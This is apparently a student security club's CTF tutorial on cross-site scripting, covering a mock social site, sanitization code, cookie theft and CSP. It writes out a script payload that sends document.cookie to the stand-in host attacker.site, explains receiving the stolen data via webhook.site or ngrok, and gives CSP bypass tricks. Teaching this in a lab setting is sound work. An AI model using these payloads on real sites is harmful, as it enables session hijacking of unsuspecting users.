# XSS

## Club Resources

* [Practice Problems](https://ctf.tjcsec.club)
* [Codespaces Desktop](https://github.com/dianalin2/desktop)
* [Shell Commands List](https://hackmd.io/@tjcsc/cmd)

## What is XSS?

When you post on Facebook, the server saves your post. It then displays your post to tons of other users. What could happen if Facebook doesn't correctly filter (or *sanitize*) your data before your post is displayed to another user?

Well, a post is just a piece of data that the server embeds in the HTML it sends back when someone requests the page. Take this response for a Fakebook post, for example:

```htmlmixed
<!DOCTYPE HTML>
<html>
    <head>
        <title>Fakebook</title>
    </head>
    <body>
        <div>
            hey tj!!! join csc pls
        </div>
    </body>
</html>
```

Your browser renders this HTML to look like the following page:

![Webpage](https://hackmd.io/_uploads/HypDvaoH6.png)

In this case, we made a post that says `hey tj!!! join csc pls`. Note, however, that we can put whatever we want as our post content. We could make a malicious post that says:

```htmlmixed
<script>
    alert('hello there!!!');
</script>
```

This would make the post's web page look like:

```htmlmixed
<!DOCTYPE HTML>
<html>
    <head>
        <title>Fakebook</title>
    </head>
    <body>
        <div>
            <script>
                alert('hello there!!!');
            </script>
        </div>
    </body>
</html>
```

The `<script>` tag tells the browser that its inner content is a script (written in [JavaScript](https://www.javascript.com/)), and the browser runs it. That means we can run any arbitrary script on the page. The payload (i.e. our input) above generates the following alert box:

![Alert Box](https://hackmd.io/_uploads/HkBp8TiHp.png)

This is a major security vulnerability. If anyone could post arbitrary JavaScript that runs whenever you view their post, they could steal a bunch of your data. **Cross-site scripting (XSS)** is the formal name for an attack that injects a script into a page in order to attack another client (user).
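To see where this vulnerability comes from, here is a minimal sketch of how a hypothetical Fakebook server might build the post page. The function names `renderPost`, `escapeHtml`, and `renderPostSafely` are made up for illustration and are not any real site's code. The first version pastes the post content straight into the HTML, so our `<script>` payload becomes a real tag. The second version *sanitizes* the content first by replacing HTML's special characters with HTML entities, so the browser displays the payload as text instead of running it.

```javascript
// Hypothetical Fakebook page renderer (illustration only, not a real site's code).

// Unsafe: the post content is pasted directly into the HTML.
function renderPost(content) {
    return `<!DOCTYPE HTML>
<html>
    <head>
        <title>Fakebook</title>
    </head>
    <body>
        <div>
            ${content}
        </div>
    </body>
</html>`;
}

// Replace characters that are special in HTML with their HTML entities.
// `&` is replaced first so the entities added afterwards aren't double-escaped.
function escapeHtml(text) {
    return text
        .replace(/&/g, "&amp;")
        .replace(/</g, "&lt;")
        .replace(/>/g, "&gt;")
        .replace(/"/g, "&quot;")
        .replace(/'/g, "&#39;");
}

// Safer: the same page, but the post content is sanitized before it is embedded.
function renderPostSafely(content) {
    return renderPost(escapeHtml(content));
}

const payload = "<script> alert('hello there!!!'); </script>";
console.log(renderPost(payload));       // the page contains a real <script> tag
console.log(renderPostSafely(payload)); // the page contains &lt;script&gt; instead
```

This entity replacement is the same idea described under Mitigations below. In practice, most web frameworks and templating engines can do this escaping for you, which is less error-prone than hand-rolling it.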
With XSS, you are (almost) never trying to attack the server. Instead, you are trying to steal data from another user.

### What data are we trying to steal?

It turns out that JavaScript is pretty powerful. It has access to a lot of things, including the DOM[^1] and the user's cookies.

Cookies generally store a user's **session data**, among other things. As you may recall, cookies are sent to the server with each request, which makes them the perfect tool for a server to keep track of who you are. This is often not malicious: perfectly well-meaning websites store a unique identifier in a cookie to remember that you are logged in as a specific user.

Because cookies store session data, an attacker who steals a user's cookies can impersonate that user. Any script running on the page can read the page's cookies with `document.cookie` (with one exception, covered under Mitigations).

### How do we steal this data?

How do attackers *steal* data and see it for themselves? Just because our injected script can read `document.cookie` doesn't mean the attacker can see its value: the script runs in the victim's browser, not the attacker's. Instead, the script must send the value back to the attacker. Attackers generally do this by making a request to an attacker-controlled website with the data attached.

We can make a request to an attacker-controlled site in various ways:

* Assigning a URL to `document.location` navigates the browser to that URL.
* `fetch(URL)` makes a request to another website in the background.

If an attacker injects a script that connects to an attacker-controlled site with the stolen data as a query parameter, the attacker can inspect that request to see exactly what was sent to their server. Assuming that the attacker controls `http://attacker.site`, an example script would look like the following:

```js
document.location = "http://attacker.site/?cookie=" + document.cookie;
```

Let's put this all together to steal someone's Fakebook session data.
We can make a post with the following content:[^2]

```htmlmixed
<script>
    document.location = "http://attacker.site/?cookie=" + document.cookie;
</script>
```

When someone views that post, they will automatically be redirected to `http://attacker.site/?cookie=session=their-session-id`. The attacker can then see this request in their server's request log:

![image](https://hackmd.io/_uploads/B1wbPAiBa.png)

Success! We just stole our first cookie!

#### webhook.site

If we don't have a web server at hand, we can use [webhook.site](https://webhook.site/) instead. webhook.site gives us a "webhook" to send data back to: it shows every HTTP request sent to our personalized URL, so we can attach data to our requests and see exactly what arrived.

First, open webhook.site in your browser. The page will show your unique, personalized URL. Copy that URL and visit it in another tab. Back on the webhook.site page, you should now see that a new GET request was made. Now, visit:

```
<your-personalized-url>?a=flag
```

You should be able to see this query string in the main webhook.site page:

![image](https://hackmd.io/_uploads/S1hUqQzrT.png)

### Admin Bot

While the end goal of XSS is usually to steal another user's data, it would be super annoying to check that you solved a challenge by manually visiting your Fakebook post and letting you steal my data. Instead, we have a robot to do that for us!

Our "admin bot" is a [Puppeteer](https://pptr.dev/) instance. Puppeteer is a Node.js library that controls Chromium (which is a bit like open-source Google Chrome), so the bot uses a real web browser, just like you and I do! The catch is that the bot does the exact same thing every time, which ensures that it doesn't screw up when testing your solution.

The manner in which the bot opens the page and interacts with it is specified by an `admin-bot.js` file.
Let's take a look at a sample file now:

```js
import flag from './flag.txt';

function sleep(time) {
    return new Promise(resolve => {
        setTimeout(resolve, time);
    });
}

export default {
    id: 'my-challenge',
    name: 'my-challenge',
    urlRegex: /^https:\/\/my-challenge\.challenge\.tjcsec\.club\//,
    timeout: 10000,
    handler: async (url, ctx) => {
        const page = await ctx.newPage();

        // for the site specified, set the bot's cookie to be the flag
        await page.setCookie({
            name: 'flag',
            value: flag,
            url
        });

        // navigate to the site
        await page.goto(url, {
            timeout: 3000,
            waitUntil: 'domcontentloaded'
        });

        // give the page (and any scripts on it) 5 seconds to run
        await sleep(5000);
    }
};
```

We have a couple of exported fields. Let's go through what each of them means:

* `id` is the ID of the challenge. You, as a competitor, can mostly ignore this.
* `name` is the name of the challenge that is displayed on the submission site. You, again, can ignore this.
* `urlRegex` is the format that submitted URLs must match. It uses a [regex](https://en.wikipedia.org/wiki/Regular_expression) to pattern match, but you don't need to know the in-depth workings of regexes for our purposes (that's an entire AI unit). You just need to be able to recognize that the above expression says you can submit any page located at https://my-challenge.challenge.tjcsec.club. If no `urlRegex` is specified, the bot is able to access any website.
* `timeout` is the time (in milliseconds) that the browser window is open for. After this time period, the window closes even if the bot is still interacting with the page.
* `handler` is the manner in which the bot interacts with the page. This function takes in the submitted URL and a browser context and interacts with the page in the manner specified, line by line. In the sample above, it sets a `flag` cookie for the submitted site, opens the page, and then waits 5 seconds.

Trying to read the admin bot configuration should not be part of the challenge; this part is not applicable in real life.
It's perfectly alright if you don't know what a configuration does. If you have any trouble reading an admin bot configuration, feel free to open a ticket or DM an officer.

## Mitigations

The best and most obvious way to prevent XSS is to properly sanitize data. Servers can do this by replacing potentially dangerous characters (like `<`, `>`, `&`, and quotes) with their respective [HTML entities](https://www.w3schools.com/html/html_entities.asp), which prevents malicious users from creating `<script>` tags. Additionally, when displaying user data on the client, setting `node.innerText` instead of `node.innerHTML` is safer because the data is inserted as plain text and is never parsed as HTML.

There are also several other mitigations that protect user data if something falls through the cracks.

### HttpOnly Cookies

Cookies can be marked `HttpOnly` to hide them from `document.cookie`. The browser still sends them with every request, so they work fine as session cookies, but JavaScript can't read them, so an injected script can't steal them this way. This makes cookies a little less flexible, since the site's own JavaScript can't read them either, but for many applications that isn't a problem.

### Content Security Policy

Content Security Policy (CSP) is an HTTP response header (or an HTML meta tag) designed to mitigate XSS. It doesn't stop injections from happening, so it should not be used as the first line of defense. Instead, it limits the damage an injection can do by restricting which resources the page can load and which scripts are allowed to run.

An example of CSP specified through an HTTP header is shown below:

```
Content-Security-Policy: default-src 'self'; img-src *; script-src example.org
```

An example of CSP specified through a meta tag is shown below:

```htmlmixed
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; img-src *; script-src example.org" />
```

The two CSPs above do exactly the same thing; they are just specified in two different ways. The next question is: what do they do?

CSPs consist of many policy directives that the browser should consider when trying to load a certain resource type.
These resources can be scripts, stylesheets, and other websites. These policies are separated by semicolons, so `default-src 'self'`, `img-src *`, and `script-src example.org` are three different policies. Each policy has two parts: the directive and one or more source values.

Common directives are listed below, but there are [many more](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy):

* `default-src` - Fallback for the other fetch directives (like the ones below) when they are not specified
* `script-src` - Valid sources for JavaScript
* `connect-src` - Valid URLs that scripts can connect to (e.g. with `fetch`)
* `img-src` - Valid sources for images
* `style-src` - Valid sources for stylesheets
* `object-src` - Valid sources for plugins loaded with `<object>` and `<embed>` (usually set to `'none'`)

Source values specify exactly where the resource is allowed to come from. Common ones are listed below, but, yet again, there are [many more](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/Sources):

* `<host-source>` (e.g. `https://*.example.com`) means that the resource can be loaded from anywhere on the specified site.
* `*` is a wildcard. Inside a host source, it matches any subdomain; on its own, it allows (almost) any URL.
* `'unsafe-inline'` means that resources (e.g. scripts, stylesheets) can be specified inline, meaning they can be written directly within the body of `<script></script>` or `<style></style>` tags.
* `'self'` means that the resource can be loaded from the same *origin* (scheme, domain/IP address, and port number) as the current page. This resource cannot be inline; instead, it must be served at another path, like `<script src="/my-script.js"></script>`.
* `'none'` means that no resource of the specified type is allowed.
* `'nonce-<value>'` (e.g. `'nonce-324fe1a4bc'`) means that resources that carry the nonce value as a tag attribute (e.g. `<script nonce="324fe1a4bc"></script>`) are allowed. This nonce value should only be used once (i.e. regenerated for every response) and should not be predictable by anyone.
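To make the policy/directive/source-value structure concrete, here is a minimal sketch that splits a CSP string into its policies and looks up which source values apply to a given directive, falling back to `default-src` when the directive isn't specified. `parseCsp` and `sourcesFor` are hypothetical helper names, and the sketch deliberately skips most of what browsers actually do (for example, it never checks whether a particular URL matches a source value).

```javascript
// Hypothetical helper: parse a CSP string into a Map of directive -> source values.
// Browsers follow the full CSP specification; this sketch ignores many edge cases.
function parseCsp(policy) {
    const directives = new Map();
    for (const piece of policy.split(";")) {
        // Each policy looks like "directive source1 source2 ..."
        const [name, ...sources] = piece.trim().split(/\s+/).filter(Boolean);
        if (!name) continue; // skip empty pieces, e.g. from a trailing ";"
        const key = name.toLowerCase();
        // If a directive appears twice, browsers keep the first one.
        if (!directives.has(key)) directives.set(key, sources);
    }
    return directives;
}

// Hypothetical helper: which sources apply to a directive?
// Fetch directives (script-src, connect-src, img-src, style-src, object-src, ...)
// fall back to default-src; this sketch assumes you only ask about those.
function sourcesFor(directives, directive) {
    if (directives.has(directive)) return directives.get(directive);
    if (directives.has("default-src")) return directives.get("default-src");
    return null; // nothing specified: this resource type is unrestricted
}

const csp = parseCsp("default-src 'self'; img-src *; script-src example.org");
console.log(sourcesFor(csp, "script-src").join(" "));  // example.org
console.log(sourcesFor(csp, "connect-src").join(" ")); // 'self' (from default-src)
console.log(sourcesFor(csp, "img-src").join(" "));     // *
```

Reading a challenge's CSP this way (directive by directive, remembering the `default-src` fallback) is a quick way to spot which resource types are actually restricted.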
#### CSP Bypass

There is no surefire way to bypass every CSP; after all, they are intended to make sites more secure. However, I do have a couple of tricks for specific cases.

`connect-src` only restricts requests that scripts make to other servers in the background (e.g. with `fetch`). Changing the document location, on the other hand, doesn't make a background request; it navigates the browser to another website. This means that you can generally use `document.location` to bypass `connect-src`.

If particular source values are restricted to `'self'`, you can try to find a way to host raw user data on the website itself. For example, does the site allow uploads? If uploaded files are accessible, you can upload a script and refer to it in your injection like so: `<script src="/uploads/my-upload"></script>`.

For other cases, you may need to host your own web server to serve files from. If this is the case, ngrok is a very useful tool.

##### ngrok

ngrok is a *reverse proxy* that lets us make a publicly accessible website quickly and easily. It forwards requests from a public URL to an HTTP server running on our own computer, so we can publicly host files that we want other people (or the admin bot) to access.

To install ngrok, run the following command:

```bash
curl -s https://ngrok-agent.s3.amazonaws.com/ngrok.asc | \
    sudo tee /etc/apt/trusted.gpg.d/ngrok.asc >/dev/null && \
    echo "deb https://ngrok-agent.s3.amazonaws.com buster main" | \
    sudo tee /etc/apt/sources.list.d/ngrok.list && \
    sudo apt update && sudo apt install ngrok
```

You can run a simple HTTP server using Python. In a bash terminal, run:

```bash
python3 -m http.server 5000
```

This starts an HTTP server on port 5000 that serves the files in the current directory. You can connect to this server at http://localhost:5000 or http://127.0.0.1:5000 **on the same computer that is running the server**.
To make this HTTP server publicly accessible, run the following command in a different terminal:

```bash
ngrok http 5000
```

We should now be able to access this website at the public URL that ngrok prints in its `Forwarding` line. (ngrok requires a free account: if it asks for an authtoken, run `ngrok config add-authtoken <your-token>` once with the token from your ngrok dashboard.)

## Conclusions

XSS is hard to completely defend against, and even large websites like [GitHub](https://robertchen.cc/blog/2021/04/03/github-pages-xss) may not be completely fortified. It's a difficult topic to wrap your mind around, so if you have any questions, feel free to contact us by:

- Asking for help during a club block
- Creating a ticket on our [Discord server](https://tjcsec.club/discord)
- DMing an officer

Happy hacking!

[^1]: The Document Object Model, or DOM, is the "tree" structure in which HTML is represented. Whenever the browser receives HTML, that HTML is parsed and converted into a "tree" with nodes (e.g. `div`s, `script`s, and `body`s) nested under other nodes. Having access to the DOM means that an attacker can see the exact layout of your page, including any sensitive info that is displayed.

[^2]: I added nice spacing to make the injection look prettier, but it would work just as well as `<script>document.location="http://attacker.site/?cookie="+document.cookie</script>`.